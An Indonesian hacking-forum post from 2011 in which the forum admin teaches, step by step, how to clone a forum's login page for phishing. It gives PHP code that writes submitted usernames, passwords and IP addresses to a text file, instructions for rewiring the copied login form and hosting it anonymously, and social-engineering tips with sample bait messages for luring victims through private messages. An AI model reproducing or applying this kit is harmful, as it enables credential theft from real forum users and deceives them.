Sky-Line
Forum | Sky-Line.N-Stars.org
Selamat Datang di FORUM Sky-Line.N-Stars.org
Bgi yg blm mendaftar klik pendaftaran/register
bgi yg sdh mendaftar klik login....

Terima kasih
By Admin Sky_Line

Trick Hacking

Topik sebelumnya Topik selanjutnya Go down

default Trick Hacking

Post by Admin on Sat Feb 05, 2011 6:25 am

setelah gue mengganti username sekarang gue ingin
jelasin gimana sih caranya membuat forum phiser trus tentu cara
menggunakan dengan baik dan benar…

nah kita mulai saja…

pertama2
anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt

nah
pada file next.php masukkan code ini

Code:
$datum =
date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location:
[You must be registered and logged in to see this link.]
$handle =
fopen(“ppp.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle,
“\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0
GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie
(“user”, “empty”, time()+3600);
exit;
?>

atau untuk
lebih memudahkan anda saya sudah sedian disini…

Code:

mediafire.com diddyvyxkwo

setelah
persiapan diatas selesai sekarang anda menuju target forum yang anda
ingin buat phisernya..
pada forum target cari halaman loginnya…
setelah
anda di forum login click kanan terus view source code ( bila anda
menggunakan firefox tekan ctrl+u)

copy paste seluruh source
codenya ke file index.html yang anda telah sediakan…
edit index.html
anda trus cari method=”post” dan gantikan dengan method=”get”
cari
juga action=”alamat link” gantikan dengan action=”next.php”

dengan
itu password log akan disafe di file ppp.txt

sekarang upload 3
file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach…
ntar gue dikira promosi lagi T_T)

setelah upload terlebih kita
check dulu…. nah mungkin anda akan melihat beberapa error
nah kita
umpakan target kita terlihat seperti [You must be registered and logged in to see this link.] copy url

terus
pada index.html kita search href=
nah kita ganti . dengan alamat
forum dia…
contohnya:

kita menemukan
./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya [You must be registered and logged in to see this link.]
… me/mac.css

nah lakukan begitu pada semua href link…
nah
untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti
cara diatas…

selesai semua kita chmood 777 3 file itu dan menuju
ke proses utama…. apa itu …???
tentu saja menipu seseorang dengan
phising kita wkakkwakwakwakaw….

nah dalam tutorial ini saya akan
memberikan sedikit tips and trick…( tentu saja sudah saya lakukan Razz)

1.
Diharapkan menggunakan phising forum pada pm ( private message)
2.
Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3.
Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising
link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke
seseorang tentang suatu topic… ( tergantung creatifitas anda)
5.
Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa
saat anda registrasi free hosting gunakan proxy yach ( menjaga
kemungkinan terburuk).

nah ini contoh yang sering gue pake di
forum luar sana
“Hey is this yours post?” atau “Did you uploaded
this?” trus gue masukin deh
[url=phising link anda]contoh link yang
ditujuh[/url]

oke demikian dari saya… maap klo kurang jelas…
ingat
klo berhasil bagi2 disini

Admin
Admin

Jumlah posting : 50
Join date : 30.01.11

Lihat profil user http://sky-line.n-stars.org

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik